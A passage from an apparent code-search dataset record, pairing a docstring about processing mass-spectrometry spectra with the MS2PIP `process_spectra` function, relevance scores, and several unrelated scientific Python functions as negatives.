target_f2, labels, ax=ax2,\n indices=indices)\n ax2.set_ylim(ax1.get_ylim())\n\n plt.savefig('fig-2.png', dpi=300)\n\n # Variation (F1, F2, F3)\n # ---------------------\n plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 3.5,))\n sns.set(rc={'axes.facecolor': '#e8e8e8'})\n ids.plot_phoneme_variation(tdatlst_f3, target_f3, labels)\n plt.savefig('fig-3.png', dpi=300)\n\n # ARI for different learning algorithms\n ari_file_f3 = os.path.join(DATADIR, 'omnirunf3.pkl')\n ari_file_f2 = os.path.join(DATADIR, '2FLearning_500ex.pkl')\n ari_ylabels = [\"ARI (F1, F2, F3)\", \"ARI (F1, F2)\"]\n sns.set(rc={'axes.facecolor': '#cccccc', 'grid.color': '#bbbbbb'})\n plot_compare([ari_file_f3, ari_file_f2], [500, 500], ari_ylabels,\n grayscale=True)\n plt.savefig('fig-4.png', dpi=300)\n\n # DPGMM ARI as a funciton of the number of samples\n # ------------------------------------------------\n f = plt.figure(tight_layout=True, facecolor='white', figsize=(7.5, 3.5,))\n sns.set(rc={'axes.facecolor': '#eeeeee', 'grid.color': '#d8d8d8'})\n ari_over_time_violin()\n plt.savefig('fig-5.png', dpi=300)",
"def __get_raw_prediction(self, chunk_info_list, patch_info_list):\n # 1 dedicated thread just to write results back to disk\n proc_pool = Pool(processes=1)\n wsi_pred_map_mmap_path = \"%s/pred_map.npy\" % self.cache_path\n\n masking = lambda x, a, b: (a <= x) & (x <= b)\n for idx in range(0, chunk_info_list.shape[0]):\n chunk_info = chunk_info_list[idx]\n # select patch basing on top left coordinate of input\n start_coord = chunk_info[0, 0]\n end_coord = chunk_info[0, 1] - self.patch_input_shape\n selection = masking(\n patch_info_list[:, 0, 0, 0], start_coord[0], end_coord[0]\n ) & masking(patch_info_list[:, 0, 0, 1], start_coord[1], end_coord[1])\n chunk_patch_info_list = np.array(\n patch_info_list[selection]\n ) # * do we need copy ?\n\n # further select only the patches within the provided mask\n chunk_patch_info_list = self.__select_valid_patches(chunk_patch_info_list)\n\n # there no valid patches, so flush 0 and skip\n if chunk_patch_info_list.shape[0] == 0:\n proc_pool.apply_async(\n _assemble_and_flush, args=(wsi_pred_map_mmap_path, chunk_info, None)\n )\n continue\n\n # shift the coordinare from wrt slide to wrt chunk\n chunk_patch_info_list -= chunk_info[:, 0]\n chunk_data = self.wsi_handler.read_region(\n chunk_info[0][0][::-1], (chunk_info[0][1] - chunk_info[0][0])[::-1]\n )\n chunk_data = np.array(chunk_data)[..., :3]\n np.save(\"%s/cache_chunk.npy\" % self.cache_path, chunk_data)\n\n pbar_desc = \"Process Chunk %d/%d\" % (idx, chunk_info_list.shape[0])\n patch_output_list = self.__run_model(\n chunk_patch_info_list[:, 0, 0], pbar_desc\n )\n\n proc_pool.apply_async(\n _assemble_and_flush,\n args=(wsi_pred_map_mmap_path, chunk_info, patch_output_list),\n )\n proc_pool.close()\n proc_pool.join()\n return",
"def computeSoftwareMLModels(df,data_label,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,group_col,model_type,ml_model,rank_features=False,compute_null=False,n_splits=10,n_repeats=10,n_jobs=1):\n software_list = df[data_label].unique()\n print('Running ML classifer on {} {}'.format(len(software_list),data_label))\n scores_concat_df = pd.DataFrame()\n feature_rank_concat_df = pd.DataFrame()\n external_scores_concat_df = pd.DataFrame()\n\n perf_pval_dict = {}\n for pipe in software_list:\n ml_df = df[df[data_label]==pipe]\n print('{} {}'.format(data_label, pipe))\n\n #cross_val_score\n scores_df, null_df, pvalue, feature_rank_df = getMLModelPerf(ml_df,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,model_type,ml_model,rank_features,compute_null,n_splits,n_repeats,n_jobs) \n scores_df[data_label] = np.tile(pipe,len(scores_df))\n scores_concat_df = scores_concat_df.append(scores_df)\n \n if compute_null:\n null_df[data_label] = np.tile('null',len(null_df))\n scores_concat_df = scores_concat_df.append(null_df)\n perf_pval_dict[pipe] = pvalue\n\n # RFECV\n if rank_features:\n feature_rank_df[data_label] = np.tile(pipe,len(feature_rank_df))\n feature_rank_concat_df = feature_rank_concat_df.append(feature_rank_df)\n\n # explicit CV for internal vs external perfomance\n if group_col:\n external_scores_df = getIndependentTestSetPerf(ml_df,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,group_col,model_type,ml_model)\n external_scores_df[data_label] = np.tile(pipe,len(external_scores_df))\n external_scores_concat_df = external_scores_concat_df.append(external_scores_df) \n\n return scores_concat_df, perf_pval_dict, feature_rank_concat_df, external_scores_concat_df",
"def _doMap(self, func, iterable):\n name = \"Mapper\"\n sys.stderr.write(\"Master[%s phase]: starting\\n\" % name)\n pipes = [mp.Pipe() for _ in range(self.num_workers)]\n proc = [mp.Process(target=spawn_mapper(func), name=name, args=(q,)) for q in pipes]\n for p in proc:\n p.daemon = True\n p.start()\n for output_p, input_p in pipes:\n input_p.close() # we don't need to read from the pipes\n qi = 0\n for item in iterable:\n pipes[qi][0].send(item)\n qi = (qi+1) % self.num_workers\n for q,_ in pipes:\n q.send(None) # add termination tokens\n q.close()\n for p in proc:\n p.join()\n sys.stderr.write(\"Master[%s phase]: ended..\\n\" % name)"
] |
[
"0.6704002",
"0.5983211",
"0.57653445",
"0.5711574",
"0.55658346",
"0.5487981",
"0.5443622",
"0.54285884",
"0.5412592",
"0.5407846",
"0.5374122",
"0.536485",
"0.536106",
"0.5355468",
"0.531436",
"0.5283513",
"0.5281439",
"0.52793396",
"0.52458423",
"0.5241992",
"0.5230075",
"0.52263445",
"0.52141356",
"0.5212488",
"0.52068275",
"0.51946336",
"0.5190377",
"0.5187453",
"0.5179245",
"0.51613593"
] |
0.7113193
|
0
|
Function for each worker to process a list of spectra. Each peptide's sequence is extracted from the mgf file. Then models are chosen based on model. PTMmap, Ntermmap and Ctermmap determine the modifications applied to each peptide sequence and the spectrum is predicted. Then either the feature vectors are returned, or a DataFrame with the predicted and empirical intensities.
|
def process_spectra(
worker_num,
data,
spec_file,
vector_file,
afile,
modfile,
modfile2,
PTMmap,
model,
fragerror,
spectrum_id_pattern,
):
ms2pip_pyx.ms2pip_init(afile, modfile, modfile2)
model_id = MODELS[model]["id"]
peaks_version = MODELS[model]["peaks_version"]
# transform pandas data structure into dictionary for easy access
if "ce" in data.columns:
specdict = (
data[["spec_id", "peptide", "modifications", "ce"]]
.set_index("spec_id")
.to_dict()
)
ces = specdict["ce"]
else:
specdict = (
data[["spec_id", "peptide", "modifications", "charge"]].set_index("spec_id").to_dict()
)
peptides = specdict["peptide"]
modifications = specdict["modifications"]
charges = specdict["charge"]
# cols contains the names of the computed features
cols_n = get_feature_names_new()
if "ce" in data.columns:
cols_n.append("ce")
# cols_n = get_feature_names_catboost()
# if vector_file
dvectors = []
dtargets = dict()
psmids = []
# else
pepid_buf = []
peplen_buf = []
charge_buf = []
mz_buf = []
target_buf = []
prediction_buf = []
vector_buf = []
spectrum_id_regex = re.compile(spectrum_id_pattern)
# Track progress for only one worker (good approximation of all workers' progress)
for spectrum in track(
read_spectrum_file(spec_file),
total=len(peptides),
disable=worker_num != 0,
transient=True,
description="",
):
# Match title with regex
match = spectrum_id_regex.search(spectrum.title)
try:
title = match[1]
except (TypeError, IndexError):
raise TitlePatternError(
"Spectrum title pattern could not be matched to spectrum IDs "
f"`{spectrum.title}`. "
" Are you sure that the regex contains a capturing group?"
)
if title not in peptides:
continue
peptide = peptides[title]
peptide = peptide.replace("L", "I")
mods = modifications[title]
if spectrum.precursor_charge:
charge = spectrum.precursor_charge
else:
charge = charges[title] # If charge cannot be parsed from MGF
if "mut" in mods:
continue
# Peptides longer then 101 lead to "Segmentation fault (core dumped)"
if len(peptide) > 100:
continue
# convert peptide string to integer list to speed up C code
peptide = np.array(
[0] + [AMINO_ACID_IDS[x] for x in peptide] + [0], dtype=np.uint16
)
try:
modpeptide = apply_mods(peptide, mods, PTMmap)
except UnknownModificationError as e:
logger.warn("Unknown modification: %s", e)
continue
# Spectrum preprocessing:
# Remove reporter ions and percursor peak, normalize, tranform
for label_type in ["iTRAQ", "TMT"]:
if label_type in model:
spectrum.remove_reporter_ions("iTRAQ")
# spectrum.remove_precursor()
spectrum.tic_norm()
spectrum.log2_transform()
# TODO: Check if 30 is good default CE!
# RG: removed `if ce == 0` in get_vector, split up into two functions
colen = 30
if "ce" in data.columns:
try:
colen = int(float(ces[title]))
except:
logger.warn("Could not parse collision energy!")
continue
if vector_file:
# get targets
targets = ms2pip_pyx.get_targets(
modpeptide,
spectrum.msms,
spectrum.peaks,
float(fragerror),
peaks_version,
)
psmids.extend([title] * (len(targets[0])))
if "ce" in data.columns:
dvectors.append(
np.array(
ms2pip_pyx.get_vector_ce(
peptide, modpeptide, charge, colen
),
dtype=np.uint16,
)
) # SD: added collision energy
else:
dvectors.append(
np.array(
ms2pip_pyx.get_vector(peptide, modpeptide, charge),
dtype=np.uint16,
)
)
# Collecting targets to dict; works for variable number of ion types
# For C-term ion types (y, y++, z), flip the order of targets,
# for correct order in vectors DataFrame
for i, t in enumerate(targets):
if i in dtargets.keys():
if i % 2 == 0:
dtargets[i].extend(t)
else:
dtargets[i].extend(t[::-1])
else:
if i % 2 == 0:
dtargets[i] = [t]
else:
dtargets[i] = [t[::-1]]
else:
# Predict the b- and y-ion intensities from the peptide
pepid_buf.append(title)
peplen_buf.append(len(peptide) - 2)
charge_buf.append(charge)
# get/append ion mzs, targets and predictions
targets = ms2pip_pyx.get_targets(
modpeptide,
spectrum.msms,
spectrum.peaks,
float(fragerror),
peaks_version,
)
target_buf.append([np.array(t, dtype=np.float32) for t in targets])
mzs = ms2pip_pyx.get_mzs(modpeptide, peaks_version)
mz_buf.append([np.array(m, dtype=np.float32) for m in mzs])
# If using xgboost model file, get feature vectors to predict outside of MP.
# Predictions will be added in `_merge_predictions` function.
if "xgboost_model_files" in MODELS[model].keys():
vector_buf.append(
np.array(
ms2pip_pyx.get_vector(peptide, modpeptide, charge),
dtype=np.uint16,
)
)
else:
predictions = ms2pip_pyx.get_predictions(
peptide, modpeptide, charge, model_id, peaks_version, colen
)
prediction_buf.append(
[np.array(p, dtype=np.float32) for p in predictions]
)
# If feature vectors requested, return specific data
if vector_file:
if dvectors:
# If num_cpu > number of spectra, dvectors can be empty
if len(dvectors) >= 1:
# Concatenate dvectors into 2D ndarray before making DataFrame to reduce
# memory usage
dvectors = np.concatenate(dvectors)
df = pd.DataFrame(dvectors, dtype=np.uint16, copy=False)
df.columns = df.columns.astype(str)
else:
df = pd.DataFrame()
return psmids, df, dtargets
# Else, return general data
return (
pepid_buf,
peplen_buf,
charge_buf,
mz_buf,
target_buf,
prediction_buf,
vector_buf,
)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_peptides(worker_num, data, afile, modfile, modfile2, PTMmap, model):\n\n ms2pip_pyx.ms2pip_init(afile, modfile, modfile2)\n\n # Prepare output variables\n pepid_buf = []\n peplen_buf = []\n charge_buf = []\n mz_buf = []\n target_buf = None\n prediction_buf = []\n vector_buf = []\n\n # transform pandas dataframe into dictionary for easy access\n if \"ce\" in data.columns:\n specdict = (\n data[[\"spec_id\", \"peptide\", \"modifications\", \"charge\", \"ce\"]]\n .set_index(\"spec_id\")\n .to_dict()\n )\n ces = specdict[\"ce\"]\n else:\n specdict = (\n data[[\"spec_id\", \"peptide\", \"modifications\", \"charge\"]]\n .set_index(\"spec_id\")\n .to_dict()\n )\n pepids = data[\"spec_id\"].tolist()\n peptides = specdict[\"peptide\"]\n modifications = specdict[\"modifications\"]\n charges = specdict[\"charge\"]\n del specdict\n\n # Track progress for only one worker (good approximation of all workers' progress)\n for pepid in track(\n pepids,\n total=len(pepids),\n disable=worker_num != 0,\n transient=True,\n description=\"\",\n ):\n peptide = peptides[pepid]\n peptide = peptide.replace(\"L\", \"I\")\n mods = modifications[pepid]\n\n # TODO: Check if 30 is good default CE!\n colen = 30\n if \"ce\" in data.columns:\n colen = ces[pepid]\n\n # Peptides longer then 101 lead to \"Segmentation fault (core dumped)\"\n if len(peptide) > 100:\n continue\n\n # convert peptide string to integer list to speed up C code\n peptide = np.array(\n [0] + [AMINO_ACID_IDS[x] for x in peptide] + [0], dtype=np.uint16\n )\n modpeptide = apply_mods(peptide, mods, PTMmap)\n\n pepid_buf.append(pepid)\n peplen = len(peptide) - 2\n peplen_buf.append(peplen)\n\n ch = charges[pepid]\n charge_buf.append(ch)\n\n model_id = MODELS[model][\"id\"]\n peaks_version = MODELS[model][\"peaks_version\"]\n\n # get ion mzs\n mzs = ms2pip_pyx.get_mzs(modpeptide, peaks_version)\n mz_buf.append([np.array(m, dtype=np.float32) for m in mzs])\n\n # If using xgboost model file, get feature vectors to predict outside of MP.\n # Predictions will be added in `_merge_predictions` function.\n if \"xgboost_model_files\" in MODELS[model].keys():\n vector_buf.append(\n np.array(\n ms2pip_pyx.get_vector(peptide, modpeptide, ch),\n dtype=np.uint16,\n )\n )\n else:\n predictions = ms2pip_pyx.get_predictions(\n peptide, modpeptide, ch, model_id, peaks_version, colen\n )\n prediction_buf.append([np.array(p, dtype=np.float32) for p in predictions])\n\n return (\n pepid_buf,\n peplen_buf,\n charge_buf,\n mz_buf,\n target_buf,\n prediction_buf,\n vector_buf,\n )",
"def run(self):\n\n # TODO: MOVE TO INIT?\n self.afile = write_amino_acid_masses()\n self.modfile = self.mods.write_modifications_file(mod_type=\"ptm\")\n self.modfile2 = self.mods.write_modifications_file(mod_type=\"sptm\")\n #\n\n self._read_peptide_information()\n\n if self.add_retention_time:\n logger.info(\"Adding retention time predictions\")\n rt_predictor = RetentionTime(config=self.params, num_cpu=self.num_cpu)\n rt_predictor.add_rt_predictions(self.data)\n\n # Spectrum file mode\n if self.spec_file:\n logger.info(\"Processing spectra and peptides...\")\n results = self._process_spectra()\n # Feature vectors requested\n if self.vector_file:\n self._write_vector_file(results)\n # Predictions (and targets) requested\n else:\n logger.debug(\"Merging results\")\n all_preds = self._merge_predictions(results)\n # Correlations also requested\n if self.compute_correlations:\n logger.info(\"Computing correlations\")\n correlations = calc_correlations.calc_correlations(all_preds)\n logger.info(\n \"Median correlations: \\n%s\",\n str(correlations.groupby(\"ion\")[\"pearsonr\"].median()),\n )\n if not self.return_results:\n corr_filename = self.output_filename + \"_correlations.csv\"\n logger.info(f\"Writing file {corr_filename}\")\n try:\n correlations.to_csv(\n corr_filename,\n index=True,\n lineterminator=\"\\n\",\n )\n except TypeError: # Pandas < 1.5 (Required for Python 3.7 support)\n correlations.to_csv(\n corr_filename,\n index=True,\n line_terminator=\"\\n\",\n )\n else:\n return correlations\n if not self.return_results:\n pae_filename = self.output_filename + \"_pred_and_emp.csv\"\n logger.info(f\"Writing file {pae_filename}...\")\n try:\n all_preds.to_csv(\n pae_filename,\n index=False,\n lineterminator=\"\\n\",\n )\n except TypeError: # Pandas < 1.5 (Required for Python 3.7 support)\n all_preds.to_csv(\n pae_filename,\n index=False,\n line_terminator=\"\\n\",\n )\n else:\n return all_preds\n\n # Match spectra mode\n elif self.match_spectra:\n results = self._process_peptides()\n matched_spectra = self._match_spectra(results)\n self._write_matched_spectra(matched_spectra)\n\n # Predictions-only mode\n else:\n logger.info(\"Processing peptides...\")\n results = self._process_peptides()\n\n logger.debug(\"Merging results ...\")\n all_preds = self._merge_predictions(results)\n\n if not self.return_results:\n self._write_predictions(all_preds)\n else:\n return all_preds",
"def modelfactors(trace_files: List[str], trace_processes: Dict):\n traces = [load(file) for file in trace_files]\n df_mfactors = pd.DataFrame(columns=MOD_FACTORS_DOC.values())\n reference = True\n for (hdf5_file, trace, cpus) in zip(trace_files, traces, trace_processes.values()):\n MOD_FACTORS_VAL['num_processes'] = cpus\n print(\n f\"==INFO== Analysing {hdf5_file} ({MOD_FACTORS_VAL['num_processes']} processes, {human_readable(os.path.getsize(hdf5_file))})\")\n\n # Computes raw data\n ipc, freq, runtime, runtime_id, useful_av, useful_max, useful_tot, useful_id, useful_inst, useful_cyc = get_raw_data(\n trace, cmdl_args)\n\n MOD_FACTORS_VAL['ipc'] = ipc\n MOD_FACTORS_VAL['freq'] = freq\n MOD_FACTORS_VAL['runtime'] = runtime\n MOD_FACTORS_VAL['runtime_id'] = runtime_id\n MOD_FACTORS_VAL['useful_av'] = useful_av\n MOD_FACTORS_VAL['useful_max'] = useful_max\n MOD_FACTORS_VAL['useful_tot'] = useful_tot\n MOD_FACTORS_VAL['useful_id'] = useful_id\n MOD_FACTORS_VAL['useful_ins'] = useful_inst\n MOD_FACTORS_VAL['useful_cyc'] = useful_cyc\n\n # Computes efficiencies after getting the raw data\n parallel_eff, load_balance, comm_eff, serial_eff, transfer_eff = get_efficiencies(\n MOD_FACTORS_VAL['runtime'],\n MOD_FACTORS_VAL['runtime_id'],\n MOD_FACTORS_VAL['useful_av'],\n MOD_FACTORS_VAL['useful_max'],\n MOD_FACTORS_VAL['useful_id'],\n MOD_FACTORS_VAL['comp_scale'])\n\n MOD_FACTORS_VAL['parallel_eff'] = parallel_eff\n MOD_FACTORS_VAL['load_balance'] = load_balance\n MOD_FACTORS_VAL['comm_eff'] = comm_eff\n MOD_FACTORS_VAL['serial_eff'] = serial_eff\n MOD_FACTORS_VAL['transfer_eff'] = transfer_eff\n\n # Adds the new row with the raw data and efficiencies to the dataframe\n df_mfactors.loc[len(df_mfactors), :] = list(MOD_FACTORS_VAL.values())\n\n # Computes scalabilities\n df_mfactors = get_scalabilities(df_mfactors, cmdl_args)\n\n return df_mfactors",
"def _process_spectra(self):\n titles = self.data[\"spec_id\"].to_list()\n\n return self._execute_in_pool(\n titles,\n process_spectra,\n (\n self.spec_file,\n self.vector_file,\n self.afile,\n self.modfile,\n self.modfile2,\n self.mods.ptm_ids,\n self.model,\n self.fragerror,\n self.spectrum_id_pattern,\n ),\n )",
"def RUN(numTrials, rateMap, numPhotons=48, angularSize=10.0, outputSize=300, mcList='MCOut.pickle',HESS=False, Sig = -1 ,numProcs = 10):\r\n print 'Beginning MC Series\\nProgress'\r\n \r\n import FermiPSF, ParseFermi\r\n mcOut = []\r\n map = pickle.load(open(rateMap, \"r\" )) # load rate-map\r\n PSFTableFront = FermiPSF.PSF_130(convType='front') # load PSF front converting\r\n PSFTableBack = FermiPSF.PSF_130(convType='back') # load PSF back converting\r\n\r\n start = time.time();\r\n \r\n ppa = outputSize/angularSize # pixel per degree\r\n\r\n # Import background template\r\n bgmap = 'BGRateMap.pickle'\r\n if (HESS == True):\r\n bgmap = 'BGRateMap_HESS_2_deg.pickle'\r\n \r\n bgTemplate = pickle.load(open(bgmap , \"r\" ))\r\n \r\n mcOut = np.zeros(numTrials)\r\n p = pool.Pool(numProcs)\r\n \r\n partial_MC_THREAD = partial( MC_THREAD, map = map,bgTemplate=bgTemplate,PSFTableFront=PSFTableFront, PSFTableBack=PSFTableBack, HESS=HESS, angularSize=angularSize, numPhotons=numPhotons, outputSize=outputSize,Sig = Sig)\r\n mcOut = p.map(partial_MC_THREAD, mcOut)\r\n \r\n# for i in range(numTrials): \r\n# # Build the background \r\n## background = Build_Background_Sideband(bgMean, lowSideband, highSideband, PSFTable)\r\n# background = Build_Background_Template(bg, bgTemplate, PSFTableFront, PSFTableBack,flatLevel = 0.0,HESS= HESS,angularSize = angularSize)\r\n# # Compute number of source photons\r\n# numMC = numPhotons - len(background[0])\r\n# # Run MC for source photons \r\n# data = MC(map,numMC,angularSize,outputSize,PSFTableFront, PSFTableBack,HESS=HESS)\r\n# # Append data\r\n# mcOut.append((data[0]+background[0], data[1]+background[1]))\r\n# \r\n# # Compute Speed Statistics\r\n# sys.stdout.write('\\r' + str(i+1)+'/'+str(numTrials)) \r\n# sys.stdout.flush()\r\n elapsed = time.time()-start;\r\n if (elapsed != 0.0):\r\n print '\\nSimulations Completed in', elapsed, 's', '(',numTrials/elapsed, ' sims per second)'\r\n \r\n outFile = open(mcList, \"wb\" )\r\n pickle.dump(mcOut, outFile)\r\n print 'Results saved to ', mcList\r\n return mcOut",
"def get_filtered_probes(seqdf, escores, models, mutate_cutoff, mutate_gap,\n egaps, thresholds, proteins, colors,\n generate_plots=False, spcomb=[(0, 0)], analysis_path=\"\",\n mode=\"custom\", predict_flanks=True, flank_len=0,\n key_colname=\"key\",\n show_model_flanks=False, get_complete_mutated=True,\n primer=\"\", max_mutate_count=2):\n filtered_probes = []\n # iterate through each site num and peak len combination\n for comb in spcomb:\n # get escore and model predictions for each protein\n es_preds = {}\n esplots = {}\n model_preds = {}\n model_plots = {}\n sitenum = comb[0]\n peaklen = comb[1]\n\n # get rows with the current sitenum and peaklen if specified\n if sitenum != 0 and peaklen != 0:\n df = seqdf.loc[(seqdf[\"sites_in_peak\"] == sitenum) & (seqdf[\"peaklen\"] == peaklen)]\n # otherwise use all rows\n else:\n df = seqdf\n # initialize escore and model objects for each protein\n for protein in proteins:\n protein_num = proteins.index(protein)\n es_preds[protein] = escores[protein].predict_sequences(df, key_colname=key_colname)\n esplots[protein] = escores[protein].make_plot_data(es_preds[protein], color=colors[protein_num][0])\n\n model_preds[protein] = models[protein].predict_sequences(df,\n key_colname=key_colname,\n predict_flanks=predict_flanks,\n flank_len=flank_len)\n model_plots[protein] = models[protein].make_plot_data(model_preds[protein],\n color=colors[protein_num][1],\n show_model_flanks=show_model_flanks)\n\n # Generate plots\n if generate_plots:\n sp = SitesPlotter()\n # if need to plot, uncomment this\n sp.plot_seq_combine([esplots, model_plots],\n filepath=\"%s/sitesplot_d%d_p%d.pdf\" %\n (analysis_path, sitenum, peaklen))\n\n # get filtered sequences\n filtered_seqs = {}\n flanks = {}\n print(\"Site filtering...\")\n print(\"Number of sites before mutating:\", len(es_preds[proteins[0]]))\n\n # get sequences with 2 significant binding sites\n sites_mutated = 0\n sites_removed = 0\n failed_mutations = 0\n for key in es_preds[proteins[0]]:\n curr_es_preds = {}\n curr_model_preds = {}\n for protein in proteins:\n curr_es_preds[protein] = es_preds[protein][key]\n curr_model_preds[protein] = model_preds[protein][key]\n #print(key,\"asd\",curr_model_preds[\"ets1\"])\n bs = Sequence(curr_es_preds, curr_model_preds, proteins=proteins,\n escore_cutoff=mutate_cutoff, escore_gap=mutate_gap,\n pbmescores=escores)\n ### print(key, bs.is_valid())\n if bs.is_valid():\n filtered_seqs[key] = bs\n # TODO: move all print statements to a log file\n # print(\"Number of sites mutated:\", sites_mutated)\n # print(\"Number of failed mutations:\", failed_mutations)\n # print(\"Number of sites removed:\", sites_removed)\n print(\"Number of sites after filtering:\", len(filtered_seqs))\n\n print(\"Creating m1,m2,m3 sequences...\")\n # for each of the filtered sequence, create m1,m2,m3 sequences\n seqdict = {}\n funcdict = {}\n for key in filtered_seqs:\n # Visualization part\n seqdict[\"%s-wt\" % key] = filtered_seqs[key].sequence\n # current binding site object\n bs = filtered_seqs[key]\n # get m1,m2,m3 for each wt\n for idx, mut in enumerate([[0], [1], [0, 1]]):\n # here we mutate on the first, second, and both sites\n # mut is the index of the site to abolish\n to_remove = bs.remove_pos(mut)\n mutseq = bs.abolish_sites(to_remove, mode=\"to_eliminate\",\n escore_threshold=mutate_cutoff)\n seqdict[\"%s-m%d\" % (key, idx + 1)] = mutseq.sequence\n funcdict[\"%s-m%d\" % (key, idx + 1)] = mutseq.plot_functions\n\n # get sequences that pass given escore gap and threshold combination\n for e in list(itertools.product(egaps, thresholds)):\n egapthres = e[0]\n ecutoff = e[1]\n\n # check that wt, m1, m2, m3 are valid\n if coopfilter.check_all_seqs(seqdict[\"%s-wt\" % key],\n seqdict[\"%s-m1\" % key],\n seqdict[\"%s-m2\" % key],\n seqdict[\"%s-m3\" % key],\n filtered_seqs[key].get_sites_dict(),\n escores,\n escore_cutoff=ecutoff,\n escore_gap=egapthres,\n get_complete_mutated=get_complete_mutated):\n bsites_dict = filtered_seqs[key].get_sites_dict()\n lst = [seqdict[\"%s-wt\" % key], seqdict[\"%s-m1\" % key], seqdict[\"%s-m2\" % key],\n seqdict[\"%s-m3\" % key]]\n lst, successful = clean_junctions(seqlst=lst,\n proteins=proteins,\n escores=escores,\n models=models,\n mutate_cutoff=mutate_cutoff,\n mutate_gap=mutate_gap,\n primer=\"GTCTTGATTCGCTTGACGCTGCTG\",\n max_mutate_count=max_mutate_count)\n if successful:\n # replace seqdict with the new sequences\n seqdict[\"%s-wt\" % key] = lst[0]\n seqdict[\"%s-m1\" % key] = lst[1]\n seqdict[\"%s-m2\" % key] = lst[2]\n seqdict[\"%s-m3\" % key] = lst[3]\n filtered_probes.append({\"key\": key,\n \"wt\": seqdict[\"%s-wt\" % key],\n \"m1\": seqdict[\"%s-m1\" % key],\n \"m2\": seqdict[\"%s-m2\" % key],\n \"m3\": seqdict[\"%s-m3\" % key],\n \"tf1\": bsites_dict[\"protein_1\"],\n \"tf2\": bsites_dict[\"protein_2\"],\n \"core1_start\": bsites_dict[\"core_start_1\"],\n \"core1_mid\": bsites_dict[\"core_mid_1\"],\n \"core1_end\": bsites_dict[\"core_end_1\"],\n \"core1_pref\": bsites_dict[\"score_1\"],\n \"core2_start\": bsites_dict[\"core_start_2\"],\n \"core2_mid\": bsites_dict[\"core_mid_2\"],\n \"core2_end\": bsites_dict[\"core_end_2\"],\n \"core2_pref\": bsites_dict[\"score_2\"],\n \"ecutoff\": ecutoff,\n \"egapthres\": egapthres,\n \"distance\": filtered_seqs[key].get_sites_dist(),\n \"sites_in_peak\": sitenum,\n \"peak_length\": peaklen\n })\n break # the sequence passes the filtering check, so stop\n\n # generate plots of wt, m1, m2, m3\n if generate_plots:\n filtered_es_preds = {}\n filtered_esplots = {}\n filtered_model_preds = {}\n filtered_model_plots = {}\n for protein in proteins:\n protein_num = proteins.index(protein)\n filtered_es_preds[protein] = escores[protein].predict_sequences(seqdict, key_colname=\"key\")\n filtered_esplots[protein] = escores[protein].make_plot_data(filtered_es_preds[protein], color=colors[protein_num][0])\n\n filtered_model_preds[protein] = models[protein].predict_sequences(seqdict,\n key_colname=\"key\",\n predict_flanks=predict_flanks)\n filtered_model_plots[protein] = models[protein].make_plot_data(filtered_model_preds[protein],\n color=colors[protein_num][1],\n show_model_flanks=show_model_flanks)\n sp.plot_seq_combine([filtered_esplots, filtered_model_plots],\n filepath=\"%splot_%s_d%d_p%d.pdf\" % (analysis_path, mode, sitenum, peaklen))\n\n return filtered_probes",
"def PARALLEL_worker_mc_inv(procnum, num_samples_per_processor, inversion_type, M_amplitude, green_func_array, real_data_array, comparison_metric, perform_normallised_waveform_inversion, compare_all_waveforms_simultaneously, return_dict_MTs, return_dict_similarity_values_all_samples, return_dict_shift_idxs, return_dict_MT_single_force_rel_amps, return_dict_medium_1_medium_2_rel_amp_ratios, invert_for_ratio_of_multiple_media_greens_func_switch, green_func_phase_labels, num_phase_types_for_media_ratios, invert_for_relative_magnitudes_switch=False, rel_exp_mag_range=[1.,1.], auto_shift_for_best_fit=True):\n print(\"Processing for process:\", procnum, \"for \", num_samples_per_processor, \"samples.\")\n \n # Define temp data stores for current process:\n tmp_MTs = np.zeros((len(green_func_array[0,:,0]), num_samples_per_processor), dtype=float)\n tmp_similarity_values_all_samples = np.zeros(num_samples_per_processor, dtype=float)\n tmp_shift_idxs_all_samples = []\n if inversion_type == \"DC_single_force_couple\" or inversion_type == \"DC_single_force_no_coupling\" or inversion_type == \"DC_crack_couple\" or inversion_type == \"single_force_crack_no_coupling\":\n tmp_MT_single_force_rel_amps = np.zeros(num_samples_per_processor, dtype=float)\n else:\n tmp_MT_single_force_rel_amps = []\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n tmp_medium_1_medium_2_rel_amp_ratios = np.zeros(num_samples_per_processor, dtype=float)\n else:\n tmp_medium_1_medium_2_rel_amp_ratios = []\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n if num_phase_types_for_media_ratios>0:\n tmp_frac_medium_2_diff_phases_dict = {} # Dictionary for temp storing of phase fractions of medium 1\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases = np.zeros((num_samples_per_processor, 3), dtype=float)\n else:\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases = []\n \n # Sort greens function storage if processing for multiple media:\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n green_func_array_total_both_media = green_func_array.copy()\n \n # 3. Loop over samples, checking how well a given MT sample synthetic wavefrom from the forward model compares to the real data:\n for i in range(num_samples_per_processor):\n # Generate random medium amplitude ratio and associated greens functions (if required):\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n # If want to invert for ratio of meduim 1 to medium 2 separately for different phases:\n if num_phase_types_for_media_ratios>0:\n # Generate different phase fractions:\n tmp_frac_medium_2_diff_phases_dict[\"P\"] = np.random.uniform(0.0, 1.0)\n tmp_frac_medium_2_diff_phases_dict[\"S\"] = np.random.uniform(0.0, 1.0)\n tmp_frac_medium_2_diff_phases_dict[\"surface\"] = np.random.uniform(0.0, 1.0)\n # Generate associated greens functions:\n green_func_array = np.zeros(np.shape(green_func_array_total_both_media[:,:,:,0]), dtype=float)\n # Loop over greens function for each station-phase:\n for j in range(len(green_func_phase_labels)):\n tmp_frac_medium_2 = tmp_frac_medium_2_diff_phases_dict[green_func_phase_labels[j]] # Get fraction for specific phase, for specific greens functions for specific station-phase\n green_func_array[j, :, :] = (1. - tmp_frac_medium_2)*green_func_array_total_both_media[j,:,:,0] + tmp_frac_medium_2*green_func_array_total_both_media[j,:,:,1] \n # Otherwise generate single fraction value and associated greens functions:\n else:\n frac_medium_2 = np.random.uniform(0.0, 1.0)\n green_func_array = (1. - frac_medium_2)*green_func_array[:,:,:,0] + frac_medium_2*green_func_array[:,:,:,1]\n \n # 4. Generate synthetic waveform for current sample:\n # Vary moment amplitude randomly if specified:\n if invert_for_relative_magnitudes_switch:\n 